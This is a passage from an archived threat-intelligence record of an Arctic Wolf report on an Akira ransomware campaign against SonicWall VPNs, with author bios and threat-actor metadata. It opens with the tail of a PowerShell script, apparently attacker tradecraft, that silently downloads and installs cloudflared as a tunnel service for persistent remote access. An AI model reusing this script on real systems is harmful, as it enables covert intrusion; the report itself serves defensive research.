download\r\n if (-not (Test-Path 'cloudflared.msi')) {\r\n throw \"MSI download failed\"\r\n }\r\n # Install MSI silently\r\n Write-Host \"Installing cloudflared MSI package...\"\r\n Start-Process msiexec -ArgumentList \"/i `\"cloudflared.msi`\" /qn /log `\"$env:ProgramData\\cloudflared_msi_in\r\n # Download EXE version\r\n Write-Host \"Downloading cloudflared EXE...\"\r\n try {\r\n Invoke-WebRequest -Uri $exeUrl -OutFile 'cloudflared.exe' -UseBasicParsing\r\n } catch {\r\n Write-Host \"Primary download failed, trying alternative method...\"\r\n Start-BitsTransfer -Source $exeUrl -Destination 'cloudflared.exe'\r\n }\r\n # Verify download\r\n if (-not (Test-Path 'cloudflared.exe')) {\r\n throw \"EXE download failed\"\r\n }\r\n # Install service\r\n Write-Host \"Installing cloudflared service...\"\r\n Start-Process -FilePath \"$PWD\\cloudflared.exe\" -ArgumentList \"service install REDACTED_BASE64_TOKEN\" -Wait\r\n Write-Host \"Installation completed successfully.\"\r\n} catch {\r\n Write-Host \"An error occurred: $_\" -ForegroundColor Red\r\n exit 1\r\n}\r\nAdditional Resources\r\nGet actionable insights and access to the security operations expertise of one of the largest security operations centers\r\n(SOCs) in the world in Arctic Wolf’s 2024 Security Operations Report.\r\nLearn what’s new, what’s changed, and what’s ahead for the cybersecurity landscape, with insights from 1,000 global IT and\r\nsecurity leaders in the Arctic Wolf State of Cybersecurity: 2024 Trends Report.\r\nAbout Arctic Wolf Labs\r\nArctic Wolf Labs is a group of elite security researchers, data scientists, and security development engineers who explore\r\nsecurity topics to deliver cutting-edge threat research on new and emerging adversaries, develop and refine advanced threat\r\ndetection models with artificial intelligence, including machine learning, and drive continuous improvement in the speed,\r\nscale, and detection efficacy of Arctic Wolf’s solution offerings.\r\nWith their deep domain knowledge, Arctic Wolf Labs brings world-class security innovations to not only Arctic Wolf’s\r\ncustomer base, but the security community at large.\r\nAuthors\r\nStefan Hostetler\r\nStefan is a Lead Threat Intelligence Researcher at Arctic Wolf. With over a decade of industry experience under his belt, he\r\nfocuses on extracting actionable insight from novel threats to help organizations protect themselves effectively.\r\nhttps://arcticwolf.com/resources/blog/smash-and-grab-aggressive-akira-campaign-targets-sonicwall-vpns/\r\nPage 28 of 29\n\nJulian Tuin\r\nJulian is a Senior Threat Intelligence Researcher at Arctic Wolf Labs with more than 6 years of industry experience. He has\r\nexperience in identifying and tracking campaigns for new and emerging threats.\r\nJon Grimm\r\nJon is a Threat Intelligence Analyst at Arctic Wolf dedicated to identifying new cyber threats and producing actionable\r\nintelligence that enhances organizational defenses. He has a background of 10 years’ experience in several domains of\r\ncybersecurity, holds a bachelor’s degree in law enforcement, and holds several industry certifications (CISSP, GCFA,\r\nGCTI).\r\nTrevor Daher\r\nTrevor Daher is a Technical Lead within Arctic Wolf’s Security Services group supporting the Managed Detection and\r\nResponse (MDR) service.\r\nJerbin Kolencheril\r\nJerbin Kolencheril is a Technical Lead within Arctic Wolf’s Security Services group supporting the Customer Security\r\nOperation Centre (cSOC). He has a Masters degree in Information Security and brings years of experience into the role.\r\nAlyssa Newbury\r\nAlyssa Newbury is a Threat Intelligence Analyst at Arctic Wolf, with over a decade of experience in tactical threat\r\nintelligence and cybersecurity. She has a background working for various agencies within the intelligence community and\r\nfocuses primarily on researching and identifying emerging cyber threats and producing impactful finished intelligence\r\nproducts.\r\nJoe Wedderspoon\r\nJoe Wedderspoon is a Senior Forensic Analyst at Arctic Wolf Incident Response, focused on leading complex incident\r\nresponse and digital forensic investigations. He holds multiple certifications and has over 7 years of operational experience\r\nin incident response, defensive cyber operations, and researching adversary tradecraft in both the public and private sectors.\r\nCole Pixley\r\nCole Pixley investigates cyber incidents as a Forensic Analyst with Arctic Wolf Incident Response. He has a bachelor’s\r\ndegree in Computer Forensics, holds multiple forensic certifications, and has extensive experience solving cyber\r\ninvestigations.\r\nSource: https://arcticwolf.com/resources/blog/smash-and-grab-aggressive-akira-campaign-targets-sonicwall-vpns/\r\nhttps://arcticwolf.com/resources/blog/smash-and-grab-aggressive-akira-campaign-targets-sonicwall-vpns/\r\nPage 29 of 29", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://arcticwolf.com/resources/blog/smash-and-grab-aggressive-akira-campaign-targets-sonicwall-vpns/" ], "report_names": [ "smash-and-grab-aggressive-akira-campaign-targets-sonicwall-vpns" ], "threat_actors": [ { "id": "2864e40a-f233-4618-ac61-b03760a41cbb", "created_at": "2023-12-01T02:02:34.272108Z", "updated_at": "2026-04-10T02:00:04.97558Z", "deleted_at": null, "main_name": "WildCard", "aliases": [], "source_name": "ETDA:WildCard", "tools": [ "RustDown", "SysJoker" ], "source_id": "ETDA", "reports": null }, { "id": "8c8fea8c-c957-4618-99ee-1e188f073a0e", "created_at": "2024-02-02T02:00:04.086766Z", "updated_at": "2026-04-10T02:00:03.563647Z", "deleted_at": null, "main_name": "Storm-1567", "aliases": [ "Akira", "PUNK SPIDER", "GOLD SAHARA" ], "source_name": "MISPGALAXY:Storm-1567", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "910b38e9-07fe-4b47-9cf4-e190a07b1b84", "created_at": "2024-04-24T02:00:49.516358Z", "updated_at": "2026-04-10T02:00:05.309426Z", "deleted_at": null, "main_name": "Akira", "aliases": [ "Akira", "GOLD SAHARA", "PUNK SPIDER", "Howling Scorpius" ], "source_name": "MITRE:Akira", "tools": [ "Mimikatz", "PsExec", "AdFind", "Akira _v2", "Akira", "Megazord", "LaZagne", "Rclone" ], "source_id": "MITRE", "reports": null }, { "id": "256a6a2d-e8a2-4497-b399-628a7fad4b3e", "created_at": "2023-11-30T02:00:07.299845Z", "updated_at": "2026-04-10T02:00:03.484788Z", "deleted_at": null, "main_name": "WildCard", "aliases": [], "source_name": "MISPGALAXY:WildCard", "tools": [], "source_id": "MISPGALAXY", "reports": null } ], "ts_created_at": 1775434949, "ts_updated_at": 1775792121, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/e97036fb6e296b37cf303f1b8310a41ca92dd59d.pdf", "text": "https://archive.orkl.eu/e97036fb6e296b37cf303f1b8310a41ca92dd59d.txt", "img": "https://archive.orkl.eu/e97036fb6e296b37cf303f1b8310a41ca92dd59d.jpg" } }